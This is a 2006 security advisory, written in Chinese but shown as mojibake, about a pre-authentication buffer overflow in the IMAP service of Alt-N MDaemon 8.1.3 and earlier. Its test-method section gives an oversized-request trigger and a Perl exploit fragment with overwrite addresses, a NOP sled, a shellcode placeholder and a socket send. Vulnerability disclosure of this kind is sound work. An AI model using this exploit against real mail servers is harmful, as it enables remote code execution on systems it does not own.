Alt-N MDaemon IMAPÔ¶³ÌÔ¤ÈÏÖ¤»º³åÇøÒç³ö©¶´

·¢²¼ÈÕÆÚ£º2006-05-29
¸üÐÂÈÕÆÚ£º2006-05-29

ÊÜÓ°Ïìϵͳ£º

Alt-N MDaemon <= 8.1.3

ÃèÊö£º

---

BUGTRAQ  ID: 18129

Alt-N MDaemonÊÇÒ»¿î»ùÓÚWindowsµÄÓʼþ·þÎñ³ÌÐò¡£

Alt-N MDaemonµÄIMAP¶ÔÔ¤ÈÏÖ¤µÄ´¦ÀíÉÏ´æÔÚ»º³åÇøÒç³ö©¶´£¬Ô¶³Ì¹¥»÷Õß¿ÉÄÜÀûÓôË©¶´ÔÚ·þÎñÆ÷ÉÏÖ´ÐÐÈÎÒâÖ¸Áî¡£

Ô¶³Ì¹¥»÷Õß¿ÉÒÔÔÚAlt-N MDaemonÔ¤ÈÏÖ¤¹ý³ÌÖз¢ËÍÌØÖÆÏûÏ¢´¥·¢IMAP·þÎñµÄÒç³ö©¶´£¬µ¼ÖÂÖ´ÐÐÈÎÒâÖ¸Áî¡£

<*À´Ô´£ºkcope £¨kingcope@gmx.net£©
  *>

²âÊÔ·½·¨£º

---

¾¯ ¸æ

ÒÔϳÌÐò(·½·¨)¿ÉÄÜ´øÓй¥»÷ÐÔ£¬½ö¹©°²È«Ñо¿Óë½Ìѧ֮Óá£Ê¹ÓÃÕß·çÏÕ×Ô¸º£¡

a001 "[X]\r\n
XΪ99555×Ö½Ú³¤¡£

»òÕߣº

$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A

$nops = "A" x 100;
$a = $nops . $shellcode . ("Z" x (0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x (0x184AC - 0x200A - 12));
print $sock "a001 \"$a\r\n";
close($sock);

½¨Ò飺

---

³§É̲¹¶¡£º

Alt-N
-----
Ä¿Ç°³§ÉÌ»¹Ã»ÓÐÌṩ²¹¶¡»òÕßÉý¼¶³ÌÐò£¬ÎÒÃǽ¨ÒéʹÓôËÈí¼þµÄÓû§Ëæʱ¹Ø×¢³§É̵ÄÖ÷Ò³ÒÔ»ñÈ¡×îа汾£º

http://www.altn.com